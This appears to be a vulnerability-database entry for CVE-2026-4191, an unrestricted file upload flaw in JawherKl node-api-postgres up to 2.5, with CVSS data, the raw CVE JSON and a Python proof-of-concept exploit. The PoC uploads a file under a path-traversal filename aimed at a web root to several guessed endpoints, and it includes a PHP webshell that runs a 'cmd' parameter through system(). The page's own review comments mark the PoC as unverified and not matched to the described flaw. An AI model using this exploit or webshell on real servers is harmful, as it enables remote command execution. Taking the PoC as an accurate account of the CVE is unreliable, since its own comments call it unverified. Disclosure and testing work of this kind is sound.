Security Vulnerability Report
CVE-2026-4191 CVSS 7.3 HIGH

CVE-2026-4191

Published: 2026-03-16 14:20:02
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in JawherKl node-api-postgres up to version 2.5. The affected function is path.extname in the file index.js of the Profile Picture Handler component. This manipulation results in an unrestricted file upload. The attack can be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No structured configuration data is available; the affected version range below is taken from the description.

JawherKl node-api-postgres <= 2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-4191 PoC - Unrestricted File Upload in JawherKl node-api-postgres
# Target: JawherKl node-api-postgres <= 2.5
# Vulnerability: Profile Picture Handler path.extname bypass
#
# NOTE(review): the page collapsed this listing onto a single line; the layout
# below is reconstructed, and the position of the trailing `return False` in
# exploit() is inferred (after the endpoint loop).  `requests` is a
# third-party package, not part of the standard library.
#
# NOTE(review): the PoC does not reference the affected handler in index.js.
# It POSTs to a hard-coded list of *guessed* upload paths, and its payload is
# a directory-traversal filename rather than an extension-check bypass, while
# the advisory classifies the issue as CWE-284 / CWE-434 (path.extname).  An
# HTTP 200 from any of these paths therefore does not, on its own, confirm
# the flaw described in the CVE; treat the PoC as unverified.

def exploit(target_url, file_path, filename):
    """
    Send the contents of ``file_path`` as a multipart ``file`` field, using
    ``filename`` as the declared filename, to each of five hard-coded
    endpoint paths appended to ``target_url``.

    Args:
        target_url: Base URL of the target; a trailing '/' is stripped before
            the endpoint path is appended.
        file_path: Local path of the file whose bytes are uploaded.
        filename: Filename sent in the multipart part.  The ``__main__``
            block passes a directory-traversal string.

    Returns:
        True on the first endpoint that answers HTTP 200; False if every
        endpoint fails or ``file_path`` does not exist.

    Notes (review):
        - Only ``FileNotFoundError`` is handled when opening the file; other
          OS errors (e.g. ``PermissionError``) propagate to the caller.
        - Success is judged solely on the status code.  Nothing here checks
          where, or whether, the server actually stored the file, so a 200
          from a generic upload route is weak evidence.
        - Each request has a 10 s timeout; a per-endpoint
          ``requests.RequestException`` is printed and the loop continues.
    """
    try:
        with open(file_path, 'rb') as f:
            file_content = f.read()
        # The multipart part name is fixed to 'file'; the content type is
        # always 'application/octet-stream' regardless of the real file type.
        files = {
            'file': (filename, file_content, 'application/octet-stream')
        }
        # Try common upload endpoints
        # NOTE(review): these paths are guesses, not taken from the affected
        # index.js; the handler's real route is not identified anywhere here.
        endpoints = [
            '/api/users/avatar',
            '/api/profile/picture',
            '/api/upload/avatar',
            '/upload',
            '/api/upload'
        ]
        for endpoint in endpoints:
            url = target_url.rstrip('/') + endpoint
            print(f"[*] Trying upload endpoint: {url}")
            try:
                response = requests.post(url, files=files, timeout=10)
                if response.status_code == 200:
                    # Any 200 is treated as success; the response body is
                    # printed but not inspected.
                    print(f"[+] File upload successful via {url}")
                    print(f"[+] Response: {response.text}")
                    return True
                else:
                    print(f"[-] Upload failed with status {response.status_code}")
            except requests.RequestException as e:
                # Connection/timeout errors on one endpoint do not abort the
                # loop; the next endpoint is tried.
                print(f"[-] Request failed: {e}")
        # NOTE(review): placement inferred from the collapsed listing — reached
        # only after every endpoint has been tried.
        return False
    except FileNotFoundError:
        print(f"[-] File not found: {file_path}")
        return False

def create_webshell(filepath):
    """
    Write a one-line PHP command-execution stub to ``filepath``.

    The stub passes the ``cmd`` query parameter to ``system()``.  This helper
    is defined but never called by the ``__main__`` block below, which
    expects the caller to supply an already-prepared file.

    Defensive note (review): files of this shape are what file-integrity
    monitoring on upload directories, and server configuration that refuses
    to execute scripts from user-writable paths, are meant to catch.
    """
    webshell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'
    with open(filepath, 'wb') as f:
        f.write(webshell)
    print(f"[+] Created webshell: {filepath}")

if __name__ == "__main__":
    # Entry point: <target_url> <malicious_file> from argv; the upload
    # filename is fixed below, not user-supplied.
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-4191.py <target_url> <malicious_file>")
        print("Example: python cve-2026-4191.py http://target.com evil.jpg")
        sys.exit(1)
    target = sys.argv[1]
    file_path = sys.argv[2]
    # Filename with path traversal to bypass extension check
    # NOTE(review): this is a CWE-22 style traversal string; whether the
    # affected path.extname handling is influenced by it is not shown here.
    malicious_filename = "../../../var/www/html/uploads/shell.php"
    print("[*] CVE-2026-4191 Exploit")
    print("[*] Target: " + target)
    print("[*] Malicious file: " + file_path)
    print("[*] Filename payload: " + malicious_filename)
    # Return value of exploit() is discarded; the exit status is always 0
    # unless an unhandled exception is raised.
    exploit(target, file_path, malicious_filename)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4191", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:02.427", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in JawherKl node-api-postgres up to 2.5. Affected is the function path.extname of the file index.js of the component Profile Picture Handler. This manipulation causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en JawherKl node-api-postgres hasta la versión 2.5. La función path.extname del archivo index.js del componente Gestor de Imágenes de Perfil está afectada. Esta manipulación provoca una carga sin restricciones. El ataque puede llevarse a cabo de forma remota. El exploit ha sido publicado y puede ser utilizado. 
Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": 
"UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://hackmd.io/@YzU_KiOzT86cEbFQdBceVg/Bk56LQQYbe", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351098", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351098", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770002", "source": "[email protected]"}]}}